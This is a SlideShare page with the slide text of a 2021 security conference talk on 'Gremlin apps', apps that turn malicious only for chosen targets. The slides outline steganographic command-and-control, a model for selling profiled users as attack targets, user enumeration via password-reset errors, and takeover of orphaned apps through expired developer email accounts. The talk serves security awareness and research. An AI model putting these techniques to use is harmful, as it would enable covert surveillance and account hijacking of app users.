Successfully reported this slideshow.
Your SlideShare is downloading. ×

Gremlin Apps & Gremlin Botnets by Chema Alonso

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Upcoming SlideShare
Facebook Platform Atl
Facebook Platform Atl
Loading in …3
×

Check these out next

1 of 36 Ad

Gremlin Apps & Gremlin Botnets by Chema Alonso

Download to read offline

Talk delivered by Chema Alonso ( https://MyPublicInbox.com/ChemaAlonso ) in Hack in the Box CyberWeek 2021 about Gremlin Apps & Gremlin Botnets. You can see the talk at: https://www.youtube.com/watch?v=yQJ5sFtOysM

Talk delivered by Chema Alonso ( https://MyPublicInbox.com/ChemaAlonso ) in Hack in the Box CyberWeek 2021 about Gremlin Apps & Gremlin Botnets. You can see the talk at: https://www.youtube.com/watch?v=yQJ5sFtOysM

Advertisement
Advertisement

More Related Content

Similar to Gremlin Apps & Gremlin Botnets by Chema Alonso (20)

More from Chema Alonso (20)

Advertisement

Recently uploaded (20)

Gremlin Apps & Gremlin Botnets by Chema Alonso

  1. 1. https://MyPublicInbox.com/ChemaAlonso Gremlin Apps & Gremlin Botnets Chema Alonso https://www.MyPublicInbox.com/ChemaAlonso
  2. 2. https://MyPublicInbox.com/ChemaAlonso Long tieme ago “FOCA is a Botnet” https://www.elladodelmal.com/2010/12/la-foca-es-una-botnet.html
  3. 3. https://MyPublicInbox.com/ChemaAlonso FOCA BOTNET Command & Control IMG with Payload (Steganography) Payload (IP+Command) GET IM G + ANSW ER GET IMG + ANSWER ANSWER Gremlim FOCA
  4. 4. https://MyPublicInbox.com/ChemaAlonso Steganography (C&C) Detection is complex = Stegoanalysis (Dinamyc App Analysis) + Reversing (Static Code Analysis)
  5. 5. https://MyPublicInbox.com/ChemaAlonso Gremlin Apps: Cut Rope Christmas
  6. 6. https://MyPublicInbox.com/ChemaAlonso Gremlin Apps: Cut Rope Christmas Goodware app until one event trigger the transformation: Data extracted, computer installed (Stuxnet), automatic app update, app stealing, selling/buyinng app, Company, “business strategy”
  7. 7. https://MyPublicInbox.com/ChemaAlonso Gremlin Apps: Pixel Batery Saver (from Battery Saver to Rogue AV) 1.- 50.000 active users 2.- Right Permisions. 3.- Cheap! 4.- Business Case works. https://www.elladodelmal.com/2015/01/la-venta-de- apps-al-cibercrimen.html
  8. 8. https://MyPublicInbox.com/ChemaAlonso Tacyt: Big Data & “Data in Motion” to watch Cybercrime in apps
  9. 9. https://MyPublicInbox.com/ChemaAlonso Tacyt: Big Data & “Data in Motion” to watch Cybercrime in apps
  10. 10. https://MyPublicInbox.com/ChemaAlonso Data Streams for “Dorks” like “Google hacking”
  11. 11. https://MyPublicInbox.com/ChemaAlonso Business Model: APT Provider with a Gremlin Botnet of apps to become malicious only one target. We sell targets, no malware. • Create a Gremlin botnet with lot of Apps to know who you are and sell you as a target for APT: • What Company you work for. • Who you are in social networks • Sell you for extorsion, data leakeage, CEO Attacks, part of a bigger APT, etc… • Who you are in the device Gremlin app is installed: • Accounts: Twitter, Facebook, etc… • Phone Number: WhatsApp, Telegram, 2FA, Account Recovery. • E-mail: Login. • A little of OSINT on the Internet • Dirty Business Card. • Turn a Gremlin App into malicious only to the target we sell. • Only one app becomes malicious. • Steganography to connect C&C • Opportunistic use of permissions (Install & RunTime)
  12. 12. https://MyPublicInbox.com/ChemaAlonso Tacyt: Android Apps (Install & RT) Permisions
  13. 13. https://MyPublicInbox.com/ChemaAlonso Permissions to get Phone Number • <uses-permission android:name="android.permission. READ_PHONE_STATE"/> • <uses-permission android:name="android.permission. READ_PHONE_NUMBERS "/>
  14. 14. https://MyPublicInbox.com/ChemaAlonso Permissions to get Phone Number & Accounts • TelephonyManager to Access phone number stored in SIM • AccountsManager get infor for Accounts (twitter, telegram, google…) • Some of them are: • Email • Phone number
  15. 15. https://MyPublicInbox.com/ChemaAlonso Version Codename API Distribution (%) Total Afectados Gingerbread 10 0,3 61,30 % < 8.0 2.3.3 -2.3.7 Ice Cream Sandwich 15 0,3 4.0.3 -4.0.4 4.1.x Jelly Bean 16 1,2 4.2.x 17 1,5 4.3 18 0,5 4.4 KitKat 19 6,9 5.0 Lollipop 21 3 5.1 22 11,5 6.0 Marshmallow 23 16,9 7.0 Nougat 24 11,4 7.1 25 7,8 8.0 Oreo 26 12,9 8.1 27 15,4 9 Pie 28 10,4 In 2018 (this PoC was done) almost 62% of devices had versions < Android 8 and let Access to Accounts (e-mail, twitter…). In 2021 (one week ago) aprox 50 % devices are still in Android 9 or less. Outdated (2018): Fragmentation and Update of Android Devices
  16. 16. https://MyPublicInbox.com/ChemaAlonso No Account pemisions? Oauth Login • Oauth Login could be more dangerous • Oauth: email, data, and you can change “scope” for one device and get everything
  17. 17. https://MyPublicInbox.com/ChemaAlonso Dirty Business Card
  18. 18. https://MyPublicInbox.com/ChemaAlonso Data Leakege & WebScrapping (weapponizing leaks) 1.- Reset Password para este e-mail 2.- Error: el usuario no existe 3.- Error: el usuario sí existe
  19. 19. https://MyPublicInbox.com/ChemaAlonso Gremlin Botnet: Buying the right app permissionName:"android.permission.GET_ACCOUNTS" permissionName:"android.permission.INTERNET" permissionName:"android.permission.READ_EXTERNAL_STORAG E" permissionName:"android.permission.READ_PHONE_STATE" permissionName:"android.permission.ACCESS_NETWORK_STATE
  20. 20. https://MyPublicInbox.com/ChemaAlonso Gremlin Botnet: Looking for the perfect target
  21. 21. https://MyPublicInbox.com/ChemaAlonso mASAPP. Controls app for sale!
  22. 22. https://MyPublicInbox.com/ChemaAlonso Gremlim Botnet: Oppotunistic permisions usage • Nobody suspects of a permission if they can explain it • ”Yeah… it is because this is an app for enhancing photos with beauty efects" • Use permisions opportunisticly • Ex: Pokemon Go & Photo Pictures • Ex: Select a photo and take them all. • Compiller / Lib Infections? • Ej: XCodeGhost • Do your own app and “be malicious” when permission you need is in use.
  23. 23. https://MyPublicInbox.com/ChemaAlonso Quiz App: PoC for our Gremlin Botnet • Quiz App is a PoC. • Quiz App is a “What do you prefer” Game • It´s working goodware in all devices until one target is activated.. • Use steganography to exchange commands and data from and to C&C.
  24. 24. https://MyPublicInbox.com/ChemaAlonso Quiz App: PoC for our Gremlin Botnet In Our PoC e-mail, Phone # or Twitter account activated Gremlin App.
  25. 25. https://MyPublicInbox.com/ChemaAlonso Banner is, in our, case Activation Channel Quiz App: PoC for our Gremlin Botnet
  26. 26. https://MyPublicInbox.com/ChemaAlonso Gremlin App in Gremlin Botnet
  27. 27. https://MyPublicInbox.com/ChemaAlonso Quiz App: Gremlin Botnet C&C. Sell the target
  28. 28. https://MyPublicInbox.com/ChemaAlonso Gremlin Botnet C&C
  29. 29. https://MyPublicInbox.com/ChemaAlonso “Stealling” Apps with Data in Motion • What happen when a developer “die”? • When app are outdated? • Can you re-register developer accounts? • Can you Steel and app? PROVEEDOR EXPIRATION POLICY (2018) Gmail 9 months* AOL Mail 3 months FastMail End of payment GMX Mail 6 months or end of payment Hushmail 3 weeks or end of payment ICloud Never Lycos 1 month Mail.com 6 months or end of payment Mail.ru 6 months or end of payment Mailfence 7 months (free) or never(paid) Outlook.com (live mail/Hotmail) 270 days ProtonMail 3 months Rackspace End of payment Rediffmail 3 months Runbox End of payment Tutanota Nevers Yahoo! 12 months Yandex Mail 24 months Zoho 4 months or end of payment
  30. 30. https://MyPublicInbox.com/ChemaAlonso Tacyt: Orphan “apps” without developers • Study for apps with developer accounts outdated and free. • Re-register again and take control of the Google developer account.. • How many installations affected. • We selected Outlook and a sample of 217 e-mail accounts for old apps. 0 50 100 150 200 250 Cuentas sin caducar Cuentas caducadas Cuentas sin caducar Cuentas caducadas Total 209 8 Cuentas caducadas Outlook
  31. 31. https://MyPublicInbox.com/ChemaAlonso “Dead Poets Society” Cuenta de correo Apps# Nombre de las apps Downloads# XXXXXcolla@outlook.com 12 1.Insta Mirror 1,256,150 2.Insta Face 3.Insta Eyes 4.Face Blender 5.Insta Effects 6.Insta Collage 7.Insta Color 8.Animal Face 9.Insta Frames 10.Photo Shape for Instagram 11.Insta Camera 12.Insta Square XXXXXXloperapps@outlook. com 1 1.Download Video Downloader Free 1,000,000 XXXXXenes@outlook.com 1 1.Imágenes para Whatsapp 1,000,000 XXXXXXnloader@outlook.co m 1 1.IDM+ Download Manager free 500,000 XXXXXtudios@outlook.com 1 1.Super Artie World 500,000 XXXXXkit4u@outlook.com 12 346,200 2.Military Armor Mod Installer 3.Poke Cube Mod Installer 4.Elsa Mod Installer 5.RhanCandia Elevator Installer 6.Instant Structure Mod Instaler 7.Better Lucky Blocks Installer 8.AutomatedCraft Mod Installer 9.Christmas Bosses Mod Installer 10.MineKart Mod Installer 11.Security Camera Mod Installer 12.Morph Victim Mod Installer XXXXXX.sp@outlook.com 1 1.Video player for android 100,000 XXXXXX.rocha@outlook.co m 6 1.Quiz Millonario Español Gratis 152,000 2.Millionaire 3.Millionaire Quiz English 4.Quiz Milionario Italiano 5.Millionnaire Quiz Français 8 accouts = 4,854,350 downloads
  32. 32. https://MyPublicInbox.com/ChemaAlonso “Dead Poets Society”
  33. 33. https://MyPublicInbox.com/ChemaAlonso Bring Your Own Device vs Take Your Own Device • BYOD • User has a personal account with Google or Apple. • User onws the device. • Installs corporate apps IF they agree to that. • When employeer/empoloyee relationship ends user manages device to restore it as it was before. • TYOD (not a SMDM) • User has a personal account with Google or Apple. • Company owns the device. • User is ”forced” to Install apps • Whe employeer/empoloyee relationship ends.. Who manages device?
  34. 34. https://MyPublicInbox.com/ChemaAlonso Corporate Gremlin Botnet & BYOD • Corporate & Event Apps • Sideloading & Testflight (No Apps Store) • No Audit / No Open Source • Opportunistic usage of permisions • BYOD: Your Own Device • Your own Photos • Your own Contacts • Your own Messages • TYOD or Corporate device • Apple Contract / Google Contract?
  35. 35. https://MyPublicInbox.com/ChemaAlonso Corporate Gremlin Botnet in BYOD&TYOD
  36. 36. https://MyPublicInbox.com/ChemaAlonso Thanks! • Every installed app (even your Company one) can do in your device everything permisions allow it to do, therefore, always think the worst. • Trust is not enought –> Zero Trust. • Security for Top excutives means to control security for every single app installed in their profesional devices and teach them to do it in their personal ones. • Any app can become a Gremlin App eventually just because: • An evil developer • A bug in its code • App is sold • Apps is stolen Contact to Chema Alonso at MyPublicInbox.com https://MyPublicInbox.com/ChemaAlonso ”Dad, mum… can I play a free game in your device that my friends play? No.”

×